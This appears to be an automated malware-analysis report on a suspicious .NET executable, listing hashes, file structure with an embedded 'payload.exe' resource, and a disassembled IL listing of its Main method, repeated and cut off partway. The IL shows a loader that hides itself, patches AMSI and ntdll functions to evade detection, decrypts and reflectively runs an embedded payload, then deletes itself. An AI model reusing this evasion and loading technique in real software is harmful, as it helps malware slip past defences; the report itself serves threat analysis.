Suspicious
Suspect

1facb72432963ada9ef94a4c07a80fa6

PE Executable
|
MD5: 1facb72432963ada9ef94a4c07a80fa6
|
Size: 1.25 MB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Medium

Hash
 Hash Value
MD5
1facb72432963ada9ef94a4c07a80fa6
Sha1
ed5eb3bf7b70914d49fd0860db4a66e199a62a18
Sha256
025323036275f6ca30f6c79c80d2c999fe0451fe943b668055dc7bd3f8770727
Sha384
e798df53e0af896f5992dc1e816283ea826e6ce2e201fc5e67fc4c16cf53c1334cf120375ae400a15f8731f5b717c7db
Sha512
aa4f5b1333253bf7708a7e4c42a954a896f7491a3f94c2e37e4c3f852f533cb4b64dd5d5624695090c268fbc48c56f4ec520eaabecccb56f49301ee08ca81bab
SSDeep
24576:+/rK9wuttYTIC1c2EDJNVRx1ucU4s25sW6ocShToAM0RP5H/Z1:oRuDYTIkz8J1Kj25sccsnN5x1
TLSH
74453322BD2AE518E8E8F27E8664E2F37400531E9E01C9D7BCDC1DF5261EE4516AF391

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
1facb72432963ada9ef94a4c07a80fa6
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
payload.exe
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Module Name

tmpEF31.tmp
Full Name

tmpEF31.tmp
EntryPoint

System.Void mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::Main(System.String[])
Scope Name

tmpEF31.tmp
Scope Type

ModuleDef
Kind

Console
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

tmpEF31
Assembly Version

0.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

24
Main Method

System.Void mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::Main(System.String[])
Main IL Instruction Count

329
Main IL

call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.Diagnostics.ProcessModule System.Diagnostics.Process::get_MainModule() callvirt System.String System.Diagnostics.ProcessModule::get_FileName() stloc.0 <null> ldloc.0 <null> ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) ldstr kernel32.dll call System.IntPtr mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::LoadLibrary(System.String) stloc.1 <null> ldloc.1 <null> ldstr VirtualProtect call System.IntPtr mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::GetProcAddress(System.IntPtr,System.String) stloc.2 <null> ldloc.2 <null> ldtoken mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/vZOLYKpZSSYDKxVWUnAO call System.Type System.Type::GetTypeFromHandle(System.RuntimeTypeHandle) call System.Delegate System.Runtime.InteropServices.Marshal::GetDelegateForFunctionPointer(System.IntPtr,System.Type) castclass mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/vZOLYKpZSSYDKxVWUnAO stloc.3 <null> ldstr amsi.dll call System.IntPtr mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::LoadLibrary(System.String) stloc.s V_6 ldloc.s V_6 call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr 7lT5Vz+AvOoWbMEniz+BJA== call System.Byte[] System.Convert::FromBase64String(System.String) ldstr KMF+T/UYRRTqZ+yCaE5iBHsrblAl1nAjsktFBEB3GJY= call System.Byte[] System.Convert::FromBase64String(System.String) ldstr At4Jd4+5dBTDTTqMUQ22+Q== call System.Byte[] System.Convert::FromBase64String(System.String) call System.Byte[] mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::xawblEyvpjgpwRHUWpzS(System.Byte[],System.Byte[],System.Byte[]) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) call System.IntPtr mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::GetProcAddress(System.IntPtr,System.String) stloc.s V_7 call System.Int32 System.IntPtr::get_Size() ldc.i4.8 <null> bne.un.s IL_00A3: ldc.i4.8 ldc.i4.6 <null> newarr System.Byte dup <null> ldtoken <PrivateImplementationDetails>{CF775947-B64C-4FE2-B32D-F2214A54FF8B}/__StaticArrayInitTypeSize=6 <PrivateImplementationDetails>{CF775947-B64C-4FE2-B32D-F2214A54FF8B}::$$method0x6000003-1 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_4 br.s IL_00B6: ldloc.3 ldc.i4.8 <null> newarr System.Byte dup <null> ldtoken System.Int64 <PrivateImplementationDetails>{CF775947-B64C-4FE2-B32D-F2214A54FF8B}::$$method0x6000003-2 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_4 ldloc.3 <null> ldloc.s V_7 ldloc.s V_4 ldlen <null> conv.i4 <null> conv.i8 <null> call System.UIntPtr System.UIntPtr::op_Explicit(System.UInt64) ldc.i4.s 64 ldloca.s V_5 callvirt System.Boolean mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/vZOLYKpZSSYDKxVWUnAO::Invoke(System.IntPtr,System.UIntPtr,System.UInt32,System.UInt32&) pop <null> ldloc.s V_4 ldc.i4.0 <null> ldloc.s V_7 ldloc.s V_4 ldlen <null> conv.i4 <null> call System.Void System.Runtime.InteropServices.Marshal::Copy(System.Byte[],System.Int32,System.IntPtr,System.Int32) ldloc.3 <null> ldloc.s V_7 ldloc.s V_4 ldlen <null> conv.i4 <null> conv.i8 <null> call System.UIntPtr System.UIntPtr::op_Explicit(System.UInt64) ldloc.s V_5 ldloca.s V_5 callvirt System.Boolean mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/vZOLYKpZSSYDKxVWUnAO::Invoke(System.IntPtr,System.UIntPtr,System.UInt32,System.UInt32&) pop <null> ldstr ntdll.dll call System.IntPtr mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::LoadLibrary(System.String) stloc.s V_8 ldloc.s V_8 call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr K0+7fQP7UklwP+G8Bl17qA== call System.Byte[] System.Convert::FromBase64String(System.String) ldstr KMF+T/UYRRTqZ+yCaE5iBHsrblAl1nAjsktFBEB3GJY= call System.Byte[] System.Convert::FromBase64String(System.String) ldstr At4Jd4+5dBTDTTqMUQ22+Q== call System.Byte[] System.Convert::FromBase64String(System.String) call System.Byte[] mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::xawblEyvpjgpwRHUWpzS(System.Byte[],System.Byte[],System.Byte[]) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) call System.IntPtr mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::GetProcAddress(System.IntPtr,System.String) stloc.s V_9 call System.Int32 System.IntPtr::get_Size() ldc.i4.8 <null> bne.un.s IL_0153: ldc.i4.3 ldc.i4.1 <null> newarr System.Byte stloc.s V_20 ldloc.s V_20 ldc.i4.0 <null> ldc.i4 195 stelem.i1 <null> ldloc.s V_20 stloc.s V_4 br.s IL_016E: ldloc.3 ldc.i4.3 <null> newarr System.Byte stloc.s V_21 ldloc.s V_21 ldc.i4.0 <null> ldc.i4 194 stelem.i1 <null> ldloc.s V_21 ldc.i4.1 <null> ldc.i4.s 20 stelem.i1 <null> ldloc.s V_21 stloc.s V_4 ldloc.3 <null> ldloc.s V_9 ldloc.s V_4 ldlen <null> conv.i4 <null> conv.i8 <null> call System.UIntPtr System.UIntPtr::op_Explicit(System.UInt64) ldc.i4.s 64 ldloca.s V_5 callvirt System.Boolean mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/vZOLYKpZSSYDKxVWUnAO::Invoke(System.IntPtr,System.UIntPtr,System.UInt32,System.UInt32&) pop <null> ldloc.s V_4 ldc.i4.0 <null> ldloc.s V_9 ldloc.s V_4 ldlen <null> conv.i4 <null> call System.Void System.Runtime.InteropServices.Marshal::Copy(System.Byte[],System.Int32,System.IntPtr,System.Int32) ldloc.3 <null> ldloc.s V_9 ldloc.s V_4 ldlen <null> conv.i4 <null> conv.i8 <null> call System.UIntPtr System.UIntPtr::op_Explicit(System.UInt64) ldloc.s V_5 ldloca.s V_5 callvirt System.Boolean mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/vZOLYKpZSSYDKxVWUnAO::Invoke(System.IntPtr,System.UIntPtr,System.UInt32,System.UInt32&) pop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr S/uz9ucp802EJbcpSzYecw== call System.Byte[] System.Convert::FromBase64String(System.String) ldstr KMF+T/UYRRTqZ+yCaE5iBHsrblAl1nAjsktFBEB3GJY= call System.Byte[] System.Convert::FromBase64String(System.String) ldstr At4Jd4+5dBTDTTqMUQ22+Q== call System.Byte[] System.Convert::FromBase64String(System.String) call System.Byte[] mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::xawblEyvpjgpwRHUWpzS(System.Byte[],System.Byte[],System.Byte[]) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stloc.s V_10 call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr HeskabV2WCi4Yc2LFk10sw== call System.Byte[] System.Convert::FromBase64String(System.String) ldstr KMF+T/UYRRTqZ+yCaE5iBHsrblAl1nAjsktFBEB3GJY= call System.Byte[] System.Convert::FromBase64String(System.String) ldstr At4Jd4+5dBTDTTqMUQ22+Q== call System.Byte[] System.Convert::FromBase64String(System.String) call System.Byte[] mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::xawblEyvpjgpwRHUWpzS(System.Byte[],System.Byte[],System.Byte[]) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stloc.s V_11 call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() stloc.s V_12 ldloc.s V_12 callvirt System.String[] System.Reflection.Assembly::GetManifestResourceNames() stloc.s V_22 ldc.i4.0 <null> stloc.s V_23 br IL_02A0: ldloc.s V_23 ldnull <null> stloc.s V_13 newobj System.Void mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/<>c__DisplayClass3::.ctor() stloc.s V_14 ldloc.s V_14 ldloc.s V_22 ldloc.s V_23 ldelem.ref <null> stfld System.String mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/<>c__DisplayClass3::name ldloc.s V_14 ldfld System.String mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/<>c__DisplayClass3::name ldloc.s V_10 call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_029A: ldloc.s V_23 ldloc.s V_14 ldfld System.String mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/<>c__DisplayClass3::name ldloc.s V_11 call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_029A: ldloc.s V_23 ldloc.s V_14 ldfld System.String mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/<>c__DisplayClass3::name ldloc.s V_14 ldfld System.String mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/<>c__DisplayClass3::name call System.Byte[] mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::WSesTlzVzAKKeQhxtdbi(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldloc.s V_14 ldfld System.String mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/<>c__DisplayClass3::name ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) ldloc.s V_13 brtrue.s IL_028E: ldloc.s V_13 ldloc.s V_14 ldftn System.Void mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/<>c__DisplayClass3::<Main>b__1() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) stloc.s V_13 ldloc.s V_13 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) call System.Void System.Threading.Thread::Start() ldloc.s V_23 ldc.i4.1 <null> add <null> stloc.s V_23 ldloc.s V_23 ldloc.s V_22 ldlen <null> conv.i4 <null> blt IL_0220: ldnull ldloc.s V_10 call System.Byte[] mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::WSesTlzVzAKKeQhxtdbi(System.String) ldstr KMF+T/UYRRTqZ+yCaE5iBHsrblAl1nAjsktFBEB3GJY= call System.Byte[] System.Convert::FromBase64String(System.String) ldstr At4Jd4+5dBTDTTqMUQ22+Q== call System.Byte[] System.Convert::FromBase64String(System.String) call System.Byte[] mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::xawblEyvpjgpwRHUWpzS(System.Byte[],System.Byte[],System.Byte[]) call System.Byte[] mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::OZGtadjyGDkvZxZOVsEc(System.Byte[]) stloc.s V_15 ldc.i4.0 <null> newarr System.String stloc.s V_16 ldarg.0 <null> ldc.i4.0 <null> ldelem.ref <null> ldc.i4.1 <null> newarr System.Char stloc.s V_24 ldloc.s V_24 ldc.i4.0 <null> ldc.i4.s 32 stelem.i2 <null> ldloc.s V_24 callvirt System.String[] System.String::Split(System.Char[]) stloc.s V_16 leave.s IL_02F9: ldloc.s V_15 pop <null> leave.s IL_02F9: ldloc.s V_15 ldloc.s V_15 call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) callvirt System.Reflection.MethodInfo System.Reflection.Assembly::get_EntryPoint() stloc.s V_17 ldloc.s V_17 ldnull <null> ldc.i4.1 <null> newarr System.Object stloc.s V_25 ldloc.s V_25 ldc.i4.0 <null> ldloc.s V_16 stelem.ref <null> ldloc.s V_25 callvirt System.Object System.Reflection.MethodBase::Invoke(System.Object,System.Object[]) pop <null> leave.s IL_032F: call System.Text.Encoding System.Text.Encoding::get_UTF8() pop <null> ldloc.s V_17 ldnull <null> ldnull <null> callvirt System.Object System.Reflection.MethodBase::Invoke(System.Object,System.Object[]) pop <null> leave.s IL_032F: call System.Text.Encoding System.Text.Encoding::get_UTF8() call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr Nh6o4GJlfwaZDPJgE/l94U8mdkMQsGBPXIh+5fD4Qomy7l+ZeCMUJ5yUK/5k7wK8 call System.Byte[] System.Convert::FromBase64String(System.String) ldstr KMF+T/UYRRTqZ+yCaE5iBHsrblAl1nAjsktFBEB3GJY= call System.Byte[] System.Convert::FromBase64String(System.String) ldstr At4Jd4+5dBTDTTqMUQ22+Q== call System.Byte[] System.Convert::FromBase64String(System.String) call System.Byte[] mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::xawblEyvpjgpwRHUWpzS(System.Byte[],System.Byte[],System.Byte[]) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stloc.s V_18 newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor() stloc.s V_19 ldloc.s V_19 ldc.i4.5 <null> newarr System.String stloc.s V_26 ldloc.s V_26 ldc.i4.0 <null> ldloc.s V_18 stelem.ref <null> ldloc.s V_26 ldc.i4.1 <null> ldloc.0 <null> stelem.ref <null> ldloc.s V_26 ldc.i4.2 <null> ldstr " & del " stelem.ref <null> ldloc.s V_26 ldc.i4.3 <null> ldloc.0 <null> stelem.ref <null> ldloc.s V_26 ldc.i4.4 <null> ldstr " stelem.ref <null> ldloc.s V_26 call System.String System.String::Concat(System.String[]) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) ldloc.s V_19 ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) ldloc.s V_19 ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) ldloc.s V_19 ldstr cmd.exe callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) ldloc.s V_19 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) pop <null> ret <null>
Module Name

tmpEF31.tmp
Full Name

tmpEF31.tmp
EntryPoint

System.Void mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::Main(System.String[])
Scope Name

tmpEF31.tmp
Scope Type

ModuleDef
Kind

Console
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

tmpEF31
Assembly Version

0.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

24
Main Method

System.Void mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::Main(System.String[])
Main IL Instruction Count

329
Main IL

call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.Diagnostics.ProcessModule System.Diagnostics.Process::get_MainModule() callvirt System.String System.Diagnostics.ProcessModule::get_FileName() stloc.0 <null> ldloc.0 <null> ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) ldstr kernel32.dll call System.IntPtr mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::LoadLibrary(System.String) stloc.1 <null> ldloc.1 <null> ldstr VirtualProtect call System.IntPtr mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::GetProcAddress(System.IntPtr,System.String) stloc.2 <null> ldloc.2 <null> ldtoken mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/vZOLYKpZSSYDKxVWUnAO call System.Type System.Type::GetTypeFromHandle(System.RuntimeTypeHandle) call System.Delegate System.Runtime.InteropServices.Marshal::GetDelegateForFunctionPointer(System.IntPtr,System.Type) castclass mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/vZOLYKpZSSYDKxVWUnAO stloc.3 <null> ldstr amsi.dll call System.IntPtr mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::LoadLibrary(System.String) stloc.s V_6 ldloc.s V_6 call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr 7lT5Vz+AvOoWbMEniz+BJA== call System.Byte[] System.Convert::FromBase64String(System.String) ldstr KMF+T/UYRRTqZ+yCaE5iBHsrblAl1nAjsktFBEB3GJY= call System.Byte[] System.Convert::FromBase64String(System.String) ldstr At4Jd4+5dBTDTTqMUQ22+Q== call System.Byte[] System.Convert::FromBase64String(System.String) call System.Byte[] mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::xawblEyvpjgpwRHUWpzS(System.Byte[],System.Byte[],System.Byte[]) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) call System.IntPtr mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::GetProcAddress(System.IntPtr,System.String) stloc.s V_7 call System.Int32 System.IntPtr::get_Size() ldc.i4.8 <null> bne.un.s IL_00A3: ldc.i4.8 ldc.i4.6 <null> newarr System.Byte dup <null> ldtoken <PrivateImplementationDetails>{CF775947-B64C-4FE2-B32D-F2214A54FF8B}/__StaticArrayInitTypeSize=6 <PrivateImplementationDetails>{CF775947-B64C-4FE2-B32D-F2214A54FF8B}::$$method0x6000003-1 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_4 br.s IL_00B6: ldloc.3 ldc.i4.8 <null> newarr System.Byte dup <null> ldtoken System.Int64 <PrivateImplementationDetails>{CF775947-B64C-4FE2-B32D-F2214A54FF8B}::$$method0x6000003-2 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_4 ldloc.3 <null> ldloc.s V_7 ldloc.s V_4 ldlen <null> conv.i4 <null> conv.i8 <null> call System.UIntPtr System.UIntPtr::op_Explicit(System.UInt64) ldc.i4.s 64 ldloca.s V_5 callvirt System.Boolean mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/vZOLYKpZSSYDKxVWUnAO::Invoke(System.IntPtr,System.UIntPtr,System.UInt32,System.UInt32&) pop <null> ldloc.s V_4 ldc.i4.0 <null> ldloc.s V_7 ldloc.s V_4 ldlen <null> conv.i4 <null> call System.Void System.Runtime.InteropServices.Marshal::Copy(System.Byte[],System.Int32,System.IntPtr,System.Int32) ldloc.3 <null> ldloc.s V_7 ldloc.s V_4 ldlen <null> conv.i4 <null> conv.i8 <null> call System.UIntPtr System.UIntPtr::op_Explicit(System.UInt64) ldloc.s V_5 ldloca.s V_5 callvirt System.Boolean mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/vZOLYKpZSSYDKxVWUnAO::Invoke(System.IntPtr,System.UIntPtr,System.UInt32,System.UInt32&) pop <null> ldstr ntdll.dll call System.IntPtr mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::LoadLibrary(System.String) stloc.s V_8 ldloc.s V_8 call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr K0+7fQP7UklwP+G8Bl17qA== call System.Byte[] System.Convert::FromBase64String(System.String) ldstr KMF+T/UYRRTqZ+yCaE5iBHsrblAl1nAjsktFBEB3GJY= call System.Byte[] System.Convert::FromBase64String(System.String) ldstr At4Jd4+5dBTDTTqMUQ22+Q== call System.Byte[] System.Convert::FromBase64String(System.String) call System.Byte[] mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::xawblEyvpjgpwRHUWpzS(System.Byte[],System.Byte[],System.Byte[]) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) call System.IntPtr mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::GetProcAddress(System.IntPtr,System.String) stloc.s V_9 call System.Int32 System.IntPtr::get_Size() ldc.i4.8 <null> bne.un.s IL_0153: ldc.i4.3 ldc.i4.1 <null> newarr System.Byte stloc.s V_20 ldloc.s V_20 ldc.i4.0 <null> ldc.i4 195 stelem.i1 <null> ldloc.s V_20 stloc.s V_4 br.s IL_016E: ldloc.3 ldc.i4.3 <null> newarr System.Byte stloc.s V_21 ldloc.s V_21 ldc.i4.0 <null> ldc.i4 194 stelem.i1 <null> ldloc.s V_21 ldc.i4.1 <null> ldc.i4.s 20 stelem.i1 <null> ldloc.s V_21 stloc.s V_4 ldloc.3 <null> ldloc.s V_9 ldloc.s V_4 ldlen <null> conv.i4 <null> conv.i8 <null> call System.UIntPtr System.UIntPtr::op_Explicit(System.UInt64) ldc.i4.s 64 ldloca.s V_5 callvirt System.Boolean mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/vZOLYKpZSSYDKxVWUnAO::Invoke(System.IntPtr,System.UIntPtr,System.UInt32,System.UInt32&) pop <null> ldloc.s V_4 ldc.i4.0 <null> ldloc.s V_9 ldloc.s V_4 ldlen <null> conv.i4 <null> call System.Void System.Runtime.InteropServices.Marshal::Copy(System.Byte[],System.Int32,System.IntPtr,System.Int32) ldloc.3 <null> ldloc.s V_9 ldloc.s V_4 ldlen <null> conv.i4 <null> conv.i8 <null> call System.UIntPtr System.UIntPtr::op_Explicit(System.UInt64) ldloc.s V_5 ldloca.s V_5 callvirt System.Boolean mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/vZOLYKpZSSYDKxVWUnAO::Invoke(System.IntPtr,System.UIntPtr,System.UInt32,System.UInt32&) pop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr S/uz9ucp802EJbcpSzYecw== call System.Byte[] System.Convert::FromBase64String(System.String) ldstr KMF+T/UYRRTqZ+yCaE5iBHsrblAl1nAjsktFBEB3GJY= call System.Byte[] System.Convert::FromBase64String(System.String) ldstr At4Jd4+5dBTDTTqMUQ22+Q== call System.Byte[] System.Convert::FromBase64String(System.String) call System.Byte[] mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::xawblEyvpjgpwRHUWpzS(System.Byte[],System.Byte[],System.Byte[]) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stloc.s V_10 call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr HeskabV2WCi4Yc2LFk10sw== call System.Byte[] System.Convert::FromBase64String(System.String) ldstr KMF+T/UYRRTqZ+yCaE5iBHsrblAl1nAjsktFBEB3GJY= call System.Byte[] System.Convert::FromBase64String(System.String) ldstr At4Jd4+5dBTDTTqMUQ22+Q== call System.Byte[] System.Convert::FromBase64String(System.String) call System.Byte[] mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::xawblEyvpjgpwRHUWpzS(System.Byte[],System.Byte[],System.Byte[]) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stloc.s V_11 call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() stloc.s V_12 ldloc.s V_12 callvirt System.String[] System.Reflection.Assembly::GetManifestResourceNames() stloc.s V_22 ldc.i4.0 <null> stloc.s V_23 br IL_02A0: ldloc.s V_23 ldnull <null> stloc.s V_13 newobj System.Void mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/<>c__DisplayClass3::.ctor() stloc.s V_14 ldloc.s V_14 ldloc.s V_22 ldloc.s V_23 ldelem.ref <null> stfld System.String mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/<>c__DisplayClass3::name ldloc.s V_14 ldfld System.String mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/<>c__DisplayClass3::name ldloc.s V_10 call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_029A: ldloc.s V_23 ldloc.s V_14 ldfld System.String mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/<>c__DisplayClass3::name ldloc.s V_11 call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_029A: ldloc.s V_23 ldloc.s V_14 ldfld System.String mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/<>c__DisplayClass3::name ldloc.s V_14 ldfld System.String mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/<>c__DisplayClass3::name call System.Byte[] mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::WSesTlzVzAKKeQhxtdbi(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldloc.s V_14 ldfld System.String mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/<>c__DisplayClass3::name ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) ldloc.s V_13 brtrue.s IL_028E: ldloc.s V_13 ldloc.s V_14 ldftn System.Void mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/<>c__DisplayClass3::<Main>b__1() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) stloc.s V_13 ldloc.s V_13 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) call System.Void System.Threading.Thread::Start() ldloc.s V_23 ldc.i4.1 <null> add <null> stloc.s V_23 ldloc.s V_23 ldloc.s V_22 ldlen <null> conv.i4 <null> blt IL_0220: ldnull ldloc.s V_10 call System.Byte[] mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::WSesTlzVzAKKeQhxtdbi(System.String) ldstr KMF+T/UYRRTqZ+yCaE5iBHsrblAl1nAjsktFBEB3GJY= call System.Byte[] System.Convert::FromBase64String(System.String) ldstr At4Jd4+5dBTDTTqMUQ22+Q== call System.Byte[] System.Convert::FromBase64String(System.String) call System.Byte[] mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::xawblEyvpjgpwRHUWpzS(System.Byte[],System.Byte[],System.Byte[]) call System.Byte[] mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::OZGtadjyGDkvZxZOVsEc(System.Byte[]) stloc.s V_15 ldc.i4.0 <null> newarr System.String stloc.s V_16 ldarg.0 <null> ldc.i4.0 <null> ldelem.ref <null> ldc.i4.1 <null> newarr System.Char stloc.s V_24 ldloc.s V_24 ldc.i4.0 <null> ldc.i4.s 32 stelem.i2 <null> ldloc.s V_24 callvirt System.String[] System.String::Split(System.Char[]) stloc.s V_16 leave.s IL_02F9: ldloc.s V_15 pop <null> leave.s IL_02F9: ldloc.s V_15 ldloc.s V_15 call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) callvirt System.Reflection.MethodInfo System.Reflection.Assembly::get_EntryPoint() stloc.s V_17 ldloc.s V_17 ldnull <null> ldc.i4.1 <null> newarr System.Object stloc.s V_25 ldloc.s V_25 ldc.i4.0 <null> ldloc.s V_16 stelem.ref <null> ldloc.s V_25 callvirt System.Object System.Reflection.MethodBase::Invoke(System.Object,System.Object[]) pop <null> leave.s IL_032F: call System.Text.Encoding System.Text.Encoding::get_UTF8() pop <null> ldloc.s V_17 ldnull <null> ldnull <null> callvirt System.Object System.Reflection.MethodBase::Invoke(System.Object,System.Object[]) pop <null> leave.s IL_032F: call System.Text.Encoding System.Text.Encoding::get_UTF8() call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr Nh6o4GJlfwaZDPJgE/l94U8mdkMQsGBPXIh+5fD4Qomy7l+ZeCMUJ5yUK/5k7wK8 call System.Byte[] 